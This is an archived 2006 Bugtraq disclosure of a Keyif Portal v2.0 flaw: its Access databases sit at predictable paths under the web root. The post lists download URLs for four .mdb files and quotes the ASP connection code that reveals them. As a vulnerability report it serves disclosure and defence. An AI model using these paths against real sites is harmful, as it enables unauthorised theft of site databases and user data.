| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060716042840.14273.qmail@securityfocus.com>
Date: 16 Jul 2006 04:28:40 -0000
From: x0r0n@...mail.com
To: bugtraq@...urityfocus.com
Subject: Keyif Portal v2.0 - Microsoft Access Driver ( MDB ) Download
title : Keyif Portal v2.0 - Microsoft Access Driver ( MDB ) Download
-
script site : http://www.keyifweb.com/
-
Discovered : xoron
-
Cont@ct : x0r0n@...mail.com
-
Exploit : http://www.target.com/[path]/A9S7G6ASD790/ANKET/anket.mdb
http://www.target.com/[path]/A9S7G6ASD790/HABER/keyifweb.mdb
http://www.target.com/[path]/A9S7G6ASD790/ASP/download.mdb
http://www.target.com/[path]/A9S7G6ASD790/SAYAC/aktif.mdb
-
Code:
SAYAC
Veri_yolu = Server.MapPath("database/A9S7G6ASD790/SAYAC/aktif.mdb")
Bcumle = "DRIVER={Microsoft Access Driver (*.mdb)};DBQ=" & Veri_yolu
-----
ASP
Sur.Open "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" & Server.MapPath("database/A9S7G6ASD790/ASP/download.mdb")
-----
ANKET
vt_yol = server.mappath("database/A9S7G6ASD790/ANKET/anket.mdb")
Set bag = CreateObject("ADODB.Connection")
-----
DOWNLOAD
Set Sur = Server.CreateObject("ADODB.Connection")
Sur.Open "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" & Server.MapPath("database/A9S7G6ASD790/ASP/download.mdb")
-
XORON - Cyber-Warrior.Org /// special thanx R3D4C!D :)
Powered by blists - more mailing lists